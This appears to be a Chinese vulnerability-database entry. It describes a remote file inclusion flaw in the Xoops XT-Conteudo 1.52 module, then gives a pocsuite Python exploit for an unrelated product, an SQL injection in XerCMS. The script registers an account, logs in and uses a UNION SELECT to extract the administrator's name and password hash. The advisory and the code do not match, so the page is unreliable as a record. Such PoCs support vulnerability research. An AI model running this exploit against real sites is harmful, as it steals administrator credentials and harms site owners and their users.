Xoops XT-Conteudo是一款基于PHP的WEB应用程序。
Xoops XT-Conteudo不正确过滤用户提交的URI数据,远程攻击者可以利用漏洞以WEB进程权限执行任意命令。
问题是由于’spaw_control.class.php’脚本对用户提交的’spaw_root’参数缺少过滤,提交恶意的远程服务器作为包含对象,可导致以WEB进程权限执行任意PHP代码。
Xoops XT-Conteudo Module 1.52
目前没有详细解决方案提供:
<a href=“http://www.xoops.org/” target=“_blank”>http://www.xoops.org/</a>
#!/usr/bin/env python
# coding: utf-8
import re
import os
from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register
class TestPOC(POCBase):
vulID = '1885' # vul ID
version = '1'
author = ['ricter']
vulDate = '2015-06-01'
createDate = '2015-06-01'
updateDate = '2015-06-01'
references = ['']
name = 'XerCMS 20150528 /XerCMS/Modules/member/index.php SQL注入漏洞 POC'
appPowerLink = 'http://www.xercms.com/'
appName = 'XerCMS'
appVersion = '20150528'
vulType = 'SQL Injection'
desc = '''
XerCMS 将用户传入的字符直接带入无单引号保护的 SQL 语句,导致 SQL 注入
漏洞,可以获取管理员的账号密码,造成信息泄露。
'''
samples = ['']
def random(self, length=5):
return os.urandom(length).encode('hex')[:length]
def exploit(self, payload):
reg_url = '%s/?m=member&a=registerPost' % self.url
login_url = '%s/?m=member&a=loginPost' % self.url
exploit_url = (
'%s/?m=member&a=message&d=rely&id=0 union select 0,(%s)' %
(self.url, payload)
)
user = {
'member[name]': self.random(),
'member[pass]': self.random(10),
}
reg_user = {
'member[name]': user['member[name]'],
'member[pass]': user['member[pass]'],
'member[pass2]': user['member[pass]'],
'member[nick]': self.random(),
'member[email]': '%[email protected]' % self.random(),
}
sess = req.Session()
sess.post(reg_url, data=reg_user)
sess.post(login_url, data=user)
return sess.get(exploit_url).content
def _attack(self):
result = {}
response = self.exploit('select concat(name,0x3a3a,pass)from xercms_me'
'mber limit 1')
data = re.search('name="message\[uid\]" value="(?P<Username>.*?)::(?P<'
'Password>[\w\d]{32})"', response)
if data:
result['AdminInfo'] = data.groupdict()
return self.parse_attack(result)
def _verify(self):
result = {}
response = self.exploit('md5(24091293)')
if 'd55f9a6634498b197e64e134121405db' in response:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = self.url
return self.parse_attack(result)
def parse_attack(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('Internet nothing returned')
return output
register(TestPOC)